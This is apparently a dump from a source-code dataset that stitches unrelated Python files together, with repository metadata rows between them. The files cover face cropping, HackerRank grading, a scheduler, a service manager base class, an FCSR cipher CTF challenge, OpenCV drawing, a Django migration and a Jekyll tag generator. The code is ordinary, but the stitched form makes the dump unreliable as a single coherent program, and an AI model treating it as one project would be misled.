return xmin, xmax, ymin, ymax
def headFromDir(inDir, outDir, shape_model, size, faceSize, outBleed_x=0, outBleed_y=0):
shapePredict = dlib.shape_predictor(shape_model)
detector = dlib.get_frontal_face_detector()
if not os.path.exists(outDir):
os.mkdir(outDir)
count = 0
fileList = os.listdir(inDir)
for name in fileList:
count += 1
print("processing %s, current %d of total %d" % (name, count, len(fileList)))
fileName = os.path.join(inDir, name)
if not fileName.endswith('.jpg'):
continue
img = cv2.cvtColor(cv2.imread(fileName), cv2.COLOR_BGR2RGB)
dets = detector(img, 1)
if (len(dets) == 0):
print("file %s has no face" % name)
continue
det = dets[0]
shape = shapePredict(img, det)
xmin, xmax, ymin, ymax = getBound(img, shape)
if xmin < 0 or xmax < 0 or ymin < 0 or ymax < 0:
print("file %s can't get bound" % name)
continue
left = xmin
right = xmax
top = ymin
bottom = ymax
longEdge = xmax - xmin
shortEdge = ymax - ymin
if longEdge < (ymax - ymin):
longEdge = ymax - ymin
shortEdge = xmax - xmin
# To get square crop area, begin from face middle, take 1 facesize to the upward
# take 0.5 facesize to the downward, take 1.5/2 facesize to the left and right respectively.
top = int(ymin - longEdge)
bottom = int(ymax + longEdge / 2)
left = int(xmin - longEdge * 1.5 / 2)
right = int(xmax + longEdge * 1.5 / 2)
else:
left = int(xmin - shortEdge * 1.5 / 2)
right = int(xmax + shortEdge * 1.5 / 2)
top = int(ymin - shortEdge)
bottom = int(ymax + shortEdge / 2)
fullImg = np.zeros((size, size, 3))
marginLeft = 0
if left < 0:
marginLeft = -int(left * size / (right - left))
left = 0
marginTop = 0
if top < 0:
marginTop = -int(top * size / (bottom - top))
top = 0
marginRight = 0
if right > img.shape[1]:
marginRight = int((right - img.shape[1]) * size / (right - left))
right = img.shape[1]
marginBottom = 0
if bottom > img.shape[0]:
marginBottom = int((bottom - img.shape[0]) * size / (bottom - top))
bottom = img.shape[0]
cropedImg = img[top:bottom, left:right, :]
cropedImg = cv2.resize(cropedImg, dsize=(size - marginLeft - marginRight, size - marginTop - marginBottom))
fullImg[marginTop : size - marginBottom, marginLeft : size - marginRight, :] = cropedImg
if marginLeft > 0:
fullImg[marginTop:(size - marginBottom), 0:marginLeft, :] = np.tile(np.reshape(cropedImg[:,0,:], (size - marginTop - marginBottom, 1, 3)), (1, marginLeft, 1))
if marginRight > 0:
fullImg[marginTop:(size - marginBottom), (size - marginRight):size, :] = np.tile(np.reshape(cropedImg[:, cropedImg.shape[1] - 1, :], (size - marginTop - marginBottom, 1, 3)), (1, marginRight, 1))
if marginTop > 0:
fullImg[0:marginTop, :, :] = np.tile(np.reshape(fullImg[marginTop, :, :], (1, size, 3)), (marginTop, 1, 1))
if marginBottom > 0:
fullImg[(size - marginBottom):size, :, :] = np.tile(np.reshape(fullImg[(size - marginBottom), :, :], (1, size, 3)), (marginBottom, 1, 1))
fullFace = np.zeros((size, size, 3))
xminFace, xmaxFace, yminFace, ymaxFace = getFace(detector, shapePredict, fullImg.astype(np.uint8))
if xminFace == None:
print("file %s can't get face in fullImg" % name)
continue
if outBleed_x > 0:
xminFace -= outBleed_x
if xminFace < 0:
xminFace = 0
xmaxFace += outBleed_x
if xmaxFace > fullImg.shape[1]:
xmaxFace = fullImg.shape[1]
if outBleed_y > 0:
yminFace -= outBleed_y
if yminFace < 0:
yminFace = 0
fullFace[yminFace:ymaxFace, xminFace:xmaxFace, :] = fullImg[yminFace:ymaxFace, xminFace:xmaxFace, :]
combine = combineImg(fullImg, fullFace)
outPath = os.path.join(outDir, str(count).zfill(6) + '.jpg')
misc.imsave(outPath, combine)
| 40.309859 | 208 | 0.542453 |
8e9a420d670a164170f1b07674b8f564a6f898ca
| 755 |
py
|
Python
|
grading.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
grading.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
grading.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# https://www.hackerrank.com/challenges/grading/problem
def gradingStudents(grades):
rounded_grades = []
for grade in grades:
if grade >= 38:
diff = 5 - grade % 5
if diff < 3:
grade += diff
rounded_grades.append(grade)
return rounded_grades
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
grades_count = int(input().strip())
grades = []
for _ in range(grades_count):
grades_item = int(input().strip())
grades.append(grades_item)
result = gradingStudents(grades)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| 18.875 | 55 | 0.605298 |
796222768d619d9a12daf5d29c23805e7bb34365
| 965 |
py
|
Python
|
sches.py
|
dongdawang/ssrmgr
|
a9abedf8dc012bf6f421f95a1c215b5788f34322
|
[
"MIT"
] | null | null | null |
sches.py
|
dongdawang/ssrmgr
|
a9abedf8dc012bf6f421f95a1c215b5788f34322
|
[
"MIT"
] | 1 |
2021-06-01T22:59:31.000Z
|
2021-06-01T22:59:31.000Z
|
sches.py
|
dongjinhai/ssrmgr
|
a9abedf8dc012bf6f421f95a1c215b5788f34322
|
[
"MIT"
] | 1 |
2019-09-24T09:37:52.000Z
|
2019-09-24T09:37:52.000Z
|
import logging.handlers
from apscheduler.schedulers.blocking import BlockingScheduler
from mgr import UserMgr, HostMgr
handler = logging.handlers.RotatingFileHandler('log/ssrmgr.log', maxBytes=5*1024*1024, backupCount=5)
logging.basicConfig(
format='[%(asctime)s-%(filename)s-%(levelname)s:%(message)s]',
level=logging.DEBUG,
datefmt='%Y-%m-%d %I:%M:%S %p',
handlers=(handler,)
)
sched = BlockingScheduler()
@sched.scheduled_job("cron", minute="*")
def sync_user():
"""同步用户"""
um = UserMgr()
um.update_user()
@sched.scheduled_job("cron", day="*")
def send_user_usage():
"""发送用户流量记录"""
um = UserMgr()
um.send_data_usage()
@sched.scheduled_job("cron", day="*")
def send_host_usage():
"""发送主机流量记录"""
hm = HostMgr()
hm.send_data_usage()
@sched.scheduled_job("cron", minute="*")
def report_status():
"""上报主机状态"""
hm = HostMgr()
hm.report_status()
if __name__ == '__main__':
sched.start()
| 20.104167 | 101 | 0.658031 |
5c27a5443fb18fb0190c979677d2b76b49817ec3
| 519 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/guessing_game.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 71 |
2019-03-05T04:44:48.000Z
|
2022-03-24T09:47:48.000Z
|
7-assets/past-student-repos/LambdaSchool-master/m6/61b1/examples/guessing_game.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/01_intro_python/Intro-Python-II/examples/guessing_game.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 37 |
2019-03-07T05:08:03.000Z
|
2022-01-05T11:32:51.000Z
|
import random
def guessing_game():
print("Guess the number!")
secret_number = random.randrange(101)
while True:
guess = input("Input your guess: ")
try:
guess = int(guess)
except ValueError:
print("Please enter an integer.")
continue
print(f"You guessed: {guess}")
if guess == secret_number:
print("You win!")
break
elif guess < secret_number:
print("Too small!")
else:
print("Too big!")
if __name__ == '__main__':
guessing_game()
| 18.535714 | 39 | 0.60501 |
ebdb6d9e556cf90c72517ab9147b505e69274827
| 11,322 |
py
|
Python
|
workspace/cogrob/service_manager/model/base_service.py
|
CogRob/Rorg
|
dbf9d849e150404c117f6f0062476d995cec7316
|
[
"BSD-3-Clause"
] | 8 |
2019-05-07T02:30:58.000Z
|
2021-12-10T18:44:45.000Z
|
workspace/cogrob/service_manager/model/base_service.py
|
CogRob/Rorg
|
dbf9d849e150404c117f6f0062476d995cec7316
|
[
"BSD-3-Clause"
] | 1 |
2021-03-17T07:18:23.000Z
|
2021-03-17T07:18:23.000Z
|
workspace/cogrob/service_manager/model/base_service.py
|
CogRob/Rorg
|
dbf9d849e150404c117f6f0062476d995cec7316
|
[
"BSD-3-Clause"
] | 2 |
2019-05-21T14:15:24.000Z
|
2022-02-09T12:50:24.000Z
|
# Copyright (c) 2019, The Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the University of California nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OF THE UNIVERSITY OF CALIFORNIA
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from cogrob.service_manager.model import service_id
from cogrob.service_manager.model import service_request
from cogrob.service_manager.proto import service_state_pb2
from cogrob.service_manager.proto import service_options_pb2
from cogrob.service_manager.util import errors
ServiceId = service_id.ServiceId
ServiceOptions = service_options_pb2.ServiceOptions
ServiceStatePb = service_state_pb2.ServiceState
ServiceRequest = service_request.ServiceRequest
ServiceRequestId = service_request.ServiceRequestId
class BaseService(object):
"""
BaseService the common base of a service. It defines the interfaces.
Create:
[RPC handler] call FromServiceOptionsPb through a router factory function.
FromServiceOptionsPb will prepare the service (create docker
container, etc.) and register with the service manager.
Update:
By default, delete then create. Otherwise if supported, do a partial update.
Activate:
[RPC handler] Find the service and call ActRequestService.
ActRequestService will call HandleRequestService on other
services. Failures may happen, and error message will be
returned.
"""
def __init__(self, manager):
# _manager is service_manager.ServiceManager
self._manager = manager
# _service_state is service_state_pb2.ServiceState
# _service_state should include all the current state. i.e. it
# alone is sufficient to construct self.
self._service_state = None
@staticmethod
def RestoreFromProto(service_state_pb, manager):
"""Restore from a service_state_pb2.ServiceState."""
raise NotImplementedError(
"RestoreFromProto in ServiceBase must be override by derived class")
@staticmethod
def CreateFromServiceOptionsPb(service_options_pb, manager):
"""Create a service given options from the client."""
raise NotImplementedError(
"FromServiceOptionsPb in ServiceBase must be override by derived class")
def SetManager(self, manager):
self._manager = manager
def Update(self, new_options):
"""Update a service."""
raise NotImplementedError(
"Update in ServiceBase must be override by derived class")
def Remove(self):
"""Remove a service."""
raise NotImplementedError(
"Update in ServiceBase must be override by derived class")
def HandleRequestService(self, service_request):
"""Handle a request of this service (called by other services)."""
raise NotImplementedError(
"HandleRequestService in ServiceBase must be override by derived class")
def HandleReleaseService(self, service_request_id):
"""Handle a request release of this service (called by other services)."""
raise NotImplementedError(
"HandleReleaseService in ServiceBase must be override by derived class")
def ActivateSelf(self, new_options):
"""Activate self service."""
raise NotImplementedError(
"ActivateSelf in ServiceBase must be override by derived class")
def DeactivateSelf(self, new_options):
"""Deactivate self service."""
raise NotImplementedError(
"DeactivateSelf in ServiceBase must be override by derived class")
def Remove(self):
"""Remove a service."""
raise NotImplementedError(
"Update in ServiceBase must be override by derived class")
def ForceRestart(self):
"""Force restart the current service. """
# Some service is stateful: if roscore restarts, all other services will
# need to restart.
# TODO(shengye): Carefully design the usage of this interface.
raise NotImplementedError(
"ForceRestart in ServiceBase must be override by derived class")
def ActRequestService(self, service_request):
"""Bringup some services on behalf of self."""
raise NotImplementedError(
"ActRequestService in ServiceBase must be override by derived class")
def ActReleaseService(self, service_request_id):
"""Revert a previous service request on behalf of self."""
# TODO(shengye): add an immediate shutdown field.
raise NotImplementedError(
"ActReleaseService in ServiceBase must be override by derived class")
def ToProto(self):
"""Convert self to service_state_pb2.ServiceState"""
result = service_state_pb2.ServiceState()
result.CopyFrom(self._service_state)
return result
def GetServiceId(self):
"""Get service id."""
return ServiceId.FromProto(self._service_state.id)
def GetStateProto(self):
"""For derived classes, get self._service_state"""
return self._service_state
def SetStateProto(self, pb):
"""For derived classes, set self._service_state"""
self._service_state = pb
def ActRequestServiceBasic(self, request):
# Returns List[DelayedAction]
if self.GetStateProto().status != ServiceStatePb.STATUS_ACTIVE:
raise errors.ServiceNotActiveError(
"Service {} is not active.".format(self.GetServiceId()))
filtered_requests_by_self = [
x for x in self.GetStateProto().requests_by_self if
ServiceRequestId.FromProto(x.request_id) != request.request_id]
self.GetStateProto().ClearField("requests_by_self")
self.GetStateProto().requests_by_self.extend(filtered_requests_by_self)
self.GetStateProto().requests_by_self.extend([request.ToProto()])
# The HandleRequestService will return a list of DelayedAction. They are
# non-blocking. The call handler will either wait for these actions to
# finish, or let the client know the situation.
all_delayed_actions = []
for requested_service in request.requested_services:
delayed_actions = (self._manager.GetService(requested_service)
.HandleRequestService(request))
all_delayed_actions.extend(delayed_actions)
return all_delayed_actions
def ActReleaseServiceBasic(self, service_request_id):
if (self.GetStateProto().status != ServiceStatePb.STATUS_ACTIVE and
self.GetStateProto().status != ServiceStatePb.STATUS_TO_BE_STOPPED):
raise errors.ServiceNotActiveError(
"Service {} is not active.".format(self.GetServiceId()))
filtered_requests_by_self = [
x for x in self.GetStateProto().requests_by_self
if ServiceRequestId.FromProto(x.request_id) != service_request_id]
if (len(filtered_requests_by_self)
== len(self.GetStateProto().requests_by_self)):
raise errors.ServiceRequestNotExistError(
"Cannot find service request: {}".format(str(service_request_id)))
service_request = ServiceRequest.FromProto(
[x for x in self.GetStateProto().requests_by_self
if ServiceRequestId.FromProto(x.request_id) == service_request_id][0])
self.GetStateProto().ClearField("requests_by_self")
self.GetStateProto().requests_by_self.extend(filtered_requests_by_self)
all_delayed_actions = []
for requested_service in service_request.requested_services:
delayed_actions = (self._manager.GetService(requested_service)
.HandleReleaseService(service_request.request_id))
all_delayed_actions.extend(delayed_actions)
return all_delayed_actions
def HandleRequestServiceBasic(self, request):
# TODO(shengye): We should check if self.GetServiceId() is in request.
# First, record the request, but not to duplicate the request.
filtered_service_req_id = [
x for x in self.GetStateProto().requested_by_others
if ServiceRequestId.FromProto(x) != request.request_id]
self.GetStateProto().ClearField("requested_by_others")
self.GetStateProto().requested_by_others.extend(filtered_service_req_id)
self.GetStateProto().requested_by_others.extend([
request.request_id.ToProto()])
return self.ActivateSelf()
def HandleReleaseServiceBasic(self, service_request_id):
# First, remove service_request_id from requested_by_others.
filtered_service_req_id = [
x for x in self.GetStateProto().requested_by_others
if ServiceRequestId.FromProto(x) != service_request_id]
if (len(filtered_service_req_id) >=
len(self.GetStateProto().requested_by_others)):
raise errors.ServiceRequestNotExistError(
"{} does not exist in {}.".format(service_request_id,
self.GetServiceId()))
self.GetStateProto().ClearField("requested_by_others")
self.GetStateProto().requested_by_others.extend(filtered_service_req_id)
if not self.GetStateProto().requested_by_others:
# We can now turn from active to inactive and cancel our request.
return self.DeactivateSelf()
else:
return []
def GetImpliedServiceRequest(self):
implied_service_ids = [
ServiceId.FromProto(x) for x
in self.GetStateProto().options.implied_dependencies]
return service_request.ServiceRequest(
service_request.ServiceRequestId(self.GetServiceId(), "__IMPLIED"),
implied_service_ids)
def IsInSimulation(self):
if (self.GetStateProto().options.run_mode
== service_options_pb2.RUN_MODE_SIMULATION):
return True
return False
def GetCpuUsage(self):
"""Get the CPU usage of this service (direct, e.g. CPU usage for
GroupService should not include this children processes, so that's
nearly zero). Returns None if not available."""
return None
def GetMemoryUsage(self):
"""Get the memory usage of this service (direct, e.g. memory usage for
GroupService should not include this children processes, so that's
nearly zero). Returns None if not available."""
return None
def IsActive(self):
return self.GetStateProto().status == ServiceStatePb.STATUS_ACTIVE
| 38.773973 | 80 | 0.736442 |
24216d136f442be9f8d43a741c01baea46c04b03
| 1,135 |
py
|
Python
|
VolgaCTF/2021/Quals/crypto/Carry/fcsr.py
|
mystickev/ctf-archives
|
89e99a5cd5fb6b2923cad3fe1948d3ff78649b4e
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
VolgaCTF/2021/Quals/crypto/Carry/fcsr.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
VolgaCTF/2021/Quals/crypto/Carry/fcsr.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-12-19T11:06:24.000Z
|
2021-12-19T11:06:24.000Z
|
import random
import math
class FCSR():
def __init__(self, q: int, m: int, a: int):
self.m = m
self.q = q + 1
self.k = int(math.log(q, 2))
self.a = a
@staticmethod
def get_i(n: int, i: int) -> int:
# right to left
return (n & (0b1 << i)) >> i
def clock(self) -> int:
s = self.m
for i in range(1, self.k + 1):
s += self.get_i(self.q, i) * self.get_i(self.a, self.k - i)
a_k = s % 2
a_0 = self.a & 0b1
self.m = s // 2
self.a = (self.a >> 1) | (a_k << (self.k - 1))
return a_0
def encrypt(self, data: bytes) -> bytes:
encrypted = b''
for byte in data:
key_byte = 0
for _ in range(8):
bit = self.clock()
key_byte = (key_byte << 1) | bit
encrypted += int.to_bytes(key_byte ^ byte, 1, 'big')
return encrypted
if __name__ == '__main__':
q = 509
k = int(math.log(q + 1, 2))
random.seed()
a = random.randint(1, 2 ** k - 1)
test = FCSR(q, 0, a)
| 25.222222 | 72 | 0.444934 |
300fdfa379dc1de2242b38c95aac58d2693a2b18
| 940 |
py
|
Python
|
research/cv/DnCNN/src/config.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/DnCNN/src/config.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/DnCNN/src/config.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""configuration of DnCNN"""
from easydict import EasyDict as ed
config = ed(
{
'model': 'DnCNN',
'batch_size': 128,
'basic_lr': 0.001,
'epoch': 95,
'sigma': 25,
'lr_gamma': 0.2,
"save_checkpoint": True
}
)
| 31.333333 | 78 | 0.625532 |
067fc8a8c1346fa31de4ae23fd5af3b8d4d4a8d7
| 1,328 |
py
|
Python
|
python/image_processing/mat_draw.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/image_processing/mat_draw.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/image_processing/mat_draw.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
# Create a black image
img = np.zeros((512,512,3), np.uint8)
# Draw a diagonal blue line with thickness of 5 px
cv2.line(img,(0,0),(511,511),(255,0,0),5)
# image starting ending color and thickness
# The openCV BGR color format blue green red
cv2.rectangle(img,(0,0),(510,128),(0,255,0),3)
# top left corner and bottom right corner of the rectangle
cv2.circle(img,(447,63), 63, (0,0,255), -1)
# center coordinates and radius
cv2.ellipse(img,(256,256),(100,50),0,0,180,255,-1)
# center location, (major axis and minor axis lengths)
pts = np.array([[10,5],[20,30],[70,20],[50,10]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,(0,255,255))
pts = np.array([[100,5],[200,30],[370,20],[350,10]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],False,(0,255,255))
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img,'OpenCV',(10,500), font, 4,(255,255,255),2,cv2.LINE_AA)
# text data, bottom left corner from where it starts, font type, font scale (size of the font) , regular things LINE_AA is recommended
#plt.imshow(img, cmap = 'gray', interpolation = 'bicubic')
while(1):
cv2.imshow('image',img)
# for pressing Esc key -- break
if cv2.waitKey(20) & 0xFF == 27:
break
cv2.destroyAllWindows()
| 26.039216 | 134 | 0.678464 |
231cc7e138d5afbc17a32cbe4b5f68cad38defb4
| 1,284 |
py
|
Python
|
Packs/ContentManagement/Scripts/ListCreator/ListCreator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/ContentManagement/Scripts/ListCreator/ListCreator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/ContentManagement/Scripts/ListCreator/ListCreator.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
SCRIPT_NAME = 'ListCreator'
def configure_list(list_name: str, list_data: str) -> bool:
"""Create system lists using the createList built-in method.
"""
demisto.debug(f'{SCRIPT_NAME} - Setting "{list_name}" list.')
res = demisto.executeCommand('createList', {'listName': list_name, 'listData': list_data})
if is_error(res):
error_message = f'{SCRIPT_NAME} - {get_error(res)}'
demisto.debug(error_message)
return False
return True
def main():
args = demisto.args()
list_name = args.get('list_name')
list_data = args.get('list_data')
try:
configuration_status = configure_list(list_name, list_data)
return_results(
CommandResults(
outputs_prefix='ConfigurationSetup.Lists',
outputs_key_field='listname',
outputs={
'listname': list_name,
'creationstatus': 'Success.' if configuration_status else 'Failure.',
},
)
)
except Exception as e:
return_error(f'{SCRIPT_NAME} - Error occurred while setting up machine.\n{e}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 27.913043 | 94 | 0.617601 |
88d17143ab476e31e2301d0b8ab5493e57765e25
| 479 |
py
|
Python
|
Implementierung/ResearchEnvironment/AuthorizationManagement/migrations/0004_auto_20180125_1659.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
Implementierung/ResearchEnvironment/AuthorizationManagement/migrations/0004_auto_20180125_1659.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
Implementierung/ResearchEnvironment/AuthorizationManagement/migrations/0004_auto_20180125_1659.py
|
Sashks/PSE
|
ae2d8133a85563c33583f15b9ba76a3a2bf0c762
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-01-25 15:59
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('AuthorizationManagement', '0003_auto_20180125_1450'),
]
operations = [
migrations.AlterField(
model_name='resource',
name='owners',
field=models.ManyToManyField(related_name='owner', to=settings.AUTH_USER_MODEL),
),
]
| 23.95 | 92 | 0.653445 |
cc41347698f9ea1989c6c599312341a3b818595e
| 1,397 |
py
|
Python
|
setup.py
|
skylerberg/Flask-AntiCsrf
|
4cf4e7c0085bcc4b2cf64821f64d2eac9fc2081a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
skylerberg/Flask-AntiCsrf
|
4cf4e7c0085bcc4b2cf64821f64d2eac9fc2081a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
skylerberg/Flask-AntiCsrf
|
4cf4e7c0085bcc4b2cf64821f64d2eac9fc2081a
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='Flask-AntiCsrf',
py_modules=['flask_anticsrf'],
version='0.0.1',
description='Experimental anti-CSRF library for Flask apps',
long_description=long_description,
author='Skyler Berg',
author_email='[email protected]',
url='https://github.com/skylerberg/Flask-AntiCsrf',
keywords='csrf xsrf security flask',
install_requires=['Flask'],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Security',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
| 34.925 | 71 | 0.644953 |
886d2a4ee1d87c59b9565562083e48851185958e
| 1,727 |
py
|
Python
|
tag_pages_generator.py
|
rekindle-blog/rekindle-blog.github.io
|
ec17014be5435ed229bcbfaac6e970485a6e1d7d
|
[
"MIT"
] | null | null | null |
tag_pages_generator.py
|
rekindle-blog/rekindle-blog.github.io
|
ec17014be5435ed229bcbfaac6e970485a6e1d7d
|
[
"MIT"
] | 2 |
2021-07-13T21:22:51.000Z
|
2021-09-28T05:51:31.000Z
|
tag_pages_generator.py
|
rekindle-blog/rekindle-blog.github.io
|
ec17014be5435ed229bcbfaac6e970485a6e1d7d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
Initial version by Long Qian
Modified by James Cuénod
'''
import os
import yaml
post_dir = '_posts/'
tag_dir = 'tag/'
def get_filenames():
files = []
for path in os.listdir(post_dir):
if path.endswith(".md") or path.endswith(".html"):
files.append(post_dir + path)
return files
filenames = get_filenames()
total_tags = []
for filename in filenames:
f = open(filename, 'r', encoding='utf8')
crawl = False
file_yml_string = ""
for line in f:
if line.strip() == '---':
if not crawl:
crawl = True
next
else:
crawl = False
break
if crawl:
file_yml_string += line + "\n"
f.close()
yaml_object = yaml.safe_load(file_yml_string)
if "tags" in yaml_object:
total_tags.extend(yaml_object["tags"])
total_tags = set([t.strip() for t in total_tags])
tl = list(total_tags)
tl.sort()
print(tl)
existing_tags = []
old_tags = os.listdir(tag_dir)
for tag in old_tags:
if tag.endswith(".md"):
os.remove(tag_dir + tag)
existing_tags.append(tag)
if not os.path.exists(tag_dir):
os.makedirs(tag_dir)
for tag in total_tags:
tag_filename = tag_dir + tag.replace(" ", "-") + '.md'
f = open(tag_filename, 'a')
write_str = '---\nlayout: tag_page\ntitle: \"Tag: ' + tag + '\"\ntag: ' + tag + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("---")
print("Tags generated:")
total_tag_count = total_tags.__len__()
print("Total Tags: ", str(total_tag_count).rjust(4))
new_tag_count = total_tag_count - existing_tags.__len__()
print("Total New: ", str(new_tag_count).rjust(4))
| 24.323944 | 110 | 0.603937 |
ee6e890d435510c714af0dce26594e40b543591c
| 4,526 |
py
|
Python
|
research/cv/gan/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/gan/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/gan/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" postprocess """
import os
import time
import gc
import numpy as np
import matplotlib.image as mpimg
